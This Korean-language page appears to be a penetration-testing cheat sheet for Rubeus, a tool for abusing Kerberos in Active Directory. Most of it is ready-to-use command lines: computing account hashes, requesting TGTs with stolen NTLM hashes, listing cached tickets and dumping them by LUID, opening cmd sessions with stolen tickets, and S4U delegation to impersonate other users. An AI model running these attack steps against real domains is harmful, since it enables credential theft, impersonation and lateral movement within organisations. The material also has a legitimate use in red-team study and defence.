Rubeus

Rubeus는 Active Directory 환경에서 Kerberos 인증 프로토콜을 악용하기 위해 개발된 C# 기반의 오픈소스 도구입니다. 단순하게 Kerberoasting과 ASRep-Roasting과 같은 공격 이외에도, AES256/NTLM 해시 등을 수집했을 때 사용자를 가장하는 모듈과 Pass the Ticket, Overpass the Hash 기법도 지원합니다.

Pass the Hash

NTLM / AES256과 같은 해시는 그 자체로 티켓을 생성하는데 사용할 수 있습니다. 하지만 새로 생성한 머신 계정의 해시는 등록되어있지 않기 때문에 추가적으로 계산해줍니다.

# 계정의 해시 계산
./Rubeus.exe hash /user:<user> /password:<pass> /domain:<domain> 

# 사용자의 Hash 탈취 후 티켓 생성
./Rubeus.exe asktgt /user:<user> /ntlm:<ntlm hash> /nowrap

Pass the Ticket

Rubeus에서 PtT 기법을 사용하기 위해서는 다음과 같은 상황이 있습니다.

사용자의 TGT를 탈취
높은 권한을 통해 로컬에 저장된 사용자 TGT 탈취

2번은 1번의 과정 전에 로컬에 캐시된 사용자 TGT를 열거하는 과정만 추가되기에 명령어는 비슷합니다.

# 로컬에 캐시된 사용자 TGT 열거
./Rubeus.exe triage

# 열거된 티켓 중 LUID를 지정하여 티켓 탈취
./Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap

# 티켓을 통해 사용자 세션 생성
./Rubeus.exe createnetonly /ticket:<ticket> /program:C:\Windows\System32\cmd.exe

Delegation

# Delegation
./Rubeus.exe s4u /impersonateuser:<target user> /nsdsspn:<target svc> /user:<user> /ticket:<ticket> /nowrap

# 티켓을 통해 사용자 세션 생성
./Rubeus.exe createnetonly /ticket:<ticket> /program:C:\Windows\System32\cmd.exe

PreviousBloodHound NextCertipy-ad

Last updated 4 days ago

Was this helpful?